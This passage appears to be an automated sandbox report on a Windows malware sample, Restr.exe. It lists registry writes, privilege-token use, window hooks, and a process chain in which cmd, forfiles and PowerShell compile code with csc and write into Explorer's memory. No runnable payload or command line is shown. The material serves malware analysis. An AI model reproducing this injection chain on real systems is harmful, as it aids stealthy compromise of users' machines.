Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b6000000000200000000001066000000010000200000009aafcfb8ce6117f9b876193a8c9a3389f19ee682d48aaecf3c70490323885038000000000e80000000020000200000005e7caa788a823072becfcf18acd2d4485b947cddbbef55a5d36400c1eac06c5bc00000003d5c05bb9f3ca37e02c942fff432be83dc763599a4d7d018dca99e02c003e699977f999f7fbcd7001ea65d645804eab837c59a68a780dc2eca5b4d031aef28ae83be79b574814bb760b5aaa1b3d820ebe74d84c5d636dc72b7e80b964a6ba6a58cf5b044a229d4411d0502aac236ca8def91f6481803be5a5ff37f62db3d323ca0a97c5eeae51f2654ec55a6bd555bda3b08de7f8e0ad9f117f0dbfec8be3d907b08824c1b1ab2be8ba4e3dcfa3a0703872638c68afcf690f0ebe90c99000bfc400000008de5db8ad43b107c376dc23868bc33ddbd8f488f60c553bc341dd248ff3c470c4c648421dbd1449289709b875b0ed0cc9686b01f07320297231652b089f3ea5f C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000068acb49a7ca824975045a0bdef04b74522b0e854c83ed1022a556d6ab4c898e3000000000e8000000002000020000000dc996777e850aa62ae606667e8ff60765561cdf782edab37f46d4f2d650c9039c000000040a72053a1b34a63b0202929bf53d83d4c2798a183633fa77f585cd7f101ba7d62dd1d59e3d298d19080671fb24ef97a47e783a1752af1ec775d8ad0dfeff2e0d128b67f214a365687f2789c3eb9df0db723a6d45409422d41770baf996a5c51a3538866bd29f7ca0cc4781ebb3d8bbd8f5d9aacfc2f75ed1c08958b9e9cd3d30e3cc1ddffd319787eb8f34b306e06d6082be618be9fcef7221e7471d15fdc146921e7cd034865f1b293125137d7d948940a47271610e83c08ac2006ca9fe082400000009fbba3f44344568a338a373e150868d388b2581a45e6c48633178725cbf79245c690e218a4196e7e026eb33df3f3dfc5522fe8682c8636a516e3456825a1cb7f C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000ba210254f78f03869d06858b7b3e752cfd6c0719a777410e00ae45cde5c14a2c000000000e8000000002000020000000b2cf1e0f23837bbd61937dd8310e2468a46b0cf930daed9128d94cef782d505b200000002715ce0ec2919d1a0747c412d4eb2dc340a7178722e55bebedd5a2c6c314ffbc40000000949f791712220887bad279731de3cd466923e2a6b2e4097a1e06b406761c1f6d8e6899ff7f389a0e7c51d86d9bca7a41783add68f856048c246d38b77244c78a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4e00000000000000d404000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000db92f53086d89a6926bef66e80674e1609ec5d9a9fad402b2bc9b2b3566e22ae000000000e8000000002000020000000f1c99b6cf65d67b33bf83cd6a10609499401a4142d5a7dd081f1e260ce5d84bec0000000d22f9f9725ee2dd997b66d78a47eacbe112fd0024f2395ff6b99032cac31b7365f2a2096343a6284e78d81e0e2e08dc03f8c5f356e643f0a232687074348276b506fa7f70a71057ddacf51cba2a0e3350b2cd026ba414e804bd4203c771dc7c860892e6fb1f898a5df31b2c044bd40e7a2855f942c7ea11aeb14934be3852e12cc7695ebfbca3ba4d6c0ccaf06389aadca5d53e25b9b5550c9ad64ff435b97fe17e2f33a67586dcdf0b347a2d2466eeea650720e2ed87046e5f9c709fda02bd840000000c1f537651b57201c5cf391d2ce02d669015b1658170ad24c7bd9fe8905ecf279c65e4dcab6fd0049ba1d2f663ac8212cd2b25b2bc64182c959061e53a36ce9e8 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000603c03c88231341ce368558d9fc7383bc4d8624145241c40979f87c679c981c0000000000e8000000002000020000000b1c08b1f35fd26bb6130795eb6c942f1ac92bbed07d735a33df5d1b0923ffa13c000000024a803c0410ad6cc6ba580c6f106ca5e89028329e92c6286bfcaa8b67f4bd8dbe77ec42fe4cfb7c0c4dec00031fd59109a571b0b5cb05e1b7d083e527a7874e64bb3c1e651ddff74c92639bd6ec62e63f0b27d5b13a795e6533bc7f26ec7e3cf77b1e19aabeb5c56810c35beef913dc66dc58a6e4bf20c099163dc5bce75f4ef97a356ca70cb29bd35389d65d7cac2cf0186578bd5ec319cac5104ae19255b964f4b5483672501d7c015071db69a4c96a9f0b932b67aabb82d88f30a64ba01fc400000006e9670fed7447b1a3491ce7ca0f0e11d1e87a5aceadb7c3da8e7a2d1dfe674876694742682f2f201dd2204be7b60d6f3ffc41eab16675e726a1a6acc5adc317a C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "887910015" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "887910015" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b6000000000200000000001066000000010000200000006b83c848cf3e571114ccbe9d9338124ac737457d798e5a7c7b902434cda83797000000000e8000000002000020000000d1dc39dee58722767edcc443360da6aa8fd3b7c10bb56393a3eb5b0d92e977b6c00000009fb9508175c3275a28eca762f7abf350e4da4a9c2b4c4c769aae56c0f0f238cc5f300fcc102d4cf9a03f93d300d6bc104fc96d4ce18f71475df4a56f51c1e3a6579647ff86bd53384d8baa6f1e3b2d3afbcb530de85c989460123248038e4a656b11aba29044fb9dc4b7ba1f16f20295d5caab645752a00456880897de11744d5b505dbad99d6a90c60c39cff7d2aa9fb34ba52616915a1dbac6a18585a5cdad7f57a4ee7db08454af3b04656c9db03bacc95268c93f72a702e2a67d3aba449640000000513702e0a76214731eb9624b78365ce962eaebfc3cceb4badd9a0cecedf973930d942df74fa87b9cfdb331b769af2eabe788fef1b338652020448ea1ac397fc1 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6050D300-A439-11EC-B9E2-DEBD9A810609} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4760 wrote to memory of 4636 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4636 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4636 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2500 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2500 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2500 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 856 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 856 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 856 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3212 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3212 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3212 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4152 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4152 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4152 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 1148 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 1148 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 1148 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2448 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2448 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2448 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4460 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4460 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 4460 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3216 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3616 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3616 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 3616 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2372 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2372 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4760 wrote to memory of 2372 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1412 wrote to memory of 4952 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1412 wrote to memory of 4952 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 4952 wrote to memory of 2956 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 2956 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 3716 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 3716 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 228 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 228 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4624 wrote to memory of 988 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4624 wrote to memory of 988 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 988 wrote to memory of 4764 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 988 wrote to memory of 4764 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4624 wrote to memory of 4468 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4624 wrote to memory of 4468 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4468 wrote to memory of 3232 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4468 wrote to memory of 3232 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4624 wrote to memory of 2996 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4104 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe C:\Windows\Explorer.EXE

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Restr.exe

"C:\Users\Admin\AppData\Local\Temp\Restr.exe"

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82950 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82954 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82958 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82962 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

